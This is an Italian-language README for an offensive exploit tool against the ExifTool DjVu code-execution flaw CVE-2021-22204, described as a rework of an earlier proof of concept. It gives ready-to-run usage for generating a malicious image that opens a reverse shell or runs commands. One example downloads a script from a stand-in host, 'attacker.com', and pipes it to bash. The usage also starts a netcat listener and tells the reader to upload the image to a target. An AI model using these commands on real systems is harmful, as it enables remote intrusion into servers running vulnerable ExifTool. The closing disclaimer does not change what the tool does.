
Exploit RCE per ExifTool (CVE-2021-22204) - versione migliorata, nessuna dipendenza da exiftool
Una proof-of-concept aggiornata per CVE-2021-22204, una vulnerabilità nelle versioni di ExifTool dalla 7.44 alla 12.23 che consente l'esecuzione arbitraria di codice durante l'elaborazione di file DjVu dannosi.
Questo è un lavoro derivato. La vulnerabilità e l'exploit originale non sono miei.
| Ruolo | Autore |
|---|
| Vulnerabilità scoperta da | William Bowling (@wcbowling), segnalata tramite il programma bug bounty di GitLab — aprile 2021 |
| PoC originale di | UNICORD (NicPWNs & Dev-Yeoj) |
| Modifiche in questo repository di | d4ytox |
La neutralizzazione impropria dei dati utente nel formato di file DjVu nelle versioni di ExifTool dalla 7.44 alla 12.23 consente l'esecuzione arbitraria di codice durante l'analisi di un'immagine dannosa. Questo exploit genera un file immagine dannoso che, quando elaborato da una versione vulnerabile di ExifTool, esegue codice controllato dall'attaccante.
Basandosi su UNICORDev/exploit-CVE-2021-22204:
exiftool -config per incorporare il payload, che fallisce se il proprio ExifTool è stato aggiornato (v12.24+). Questa versione costruisce un payload DjVu puro utilizzando solo djvumake.\c)djvulibre-binQueste sono modifiche ingegneristiche a un exploit esistente. Non viene rivendicata alcuna ricerca sulla vulnerabilità.
sudo apt install djvulibre-bin
Reverse Shell:
python3 exploit.py -s <LHOST> <LPORT>
Comando Personalizzato:
python3 exploit.py -c "id > /tmp/pwned"
Esempi:
# Genera payload reverse shell
python3 exploit.py -s 192.168.1.100 4444
# Genera payload di esecuzione comandi
python3 exploit.py -c "curl http://attacker.com/shell.sh | bash"
# Avvia il listener e attendi la connessione
nc -nlvp 4444
L'exploit genera image.jpg - caricalo su un target dove ExifTool lo elaborerà.
Questo strumento è fornito esclusivamente per scopi educativi e di test di sicurezza autorizzati.
L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento. Utilizza questo exploit solo contro sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta al test.
L'accesso non autorizzato a sistemi informatici è illegale e punibile per legge. Usa in modo responsabile.
MIT, applicata solo alle modifiche in questo repository. La PoC a monte non ha licenza, quindi rimane tutti i diritti riservati ai suoi autori. Consulta LICENSE per l'avviso completo di attribuzione.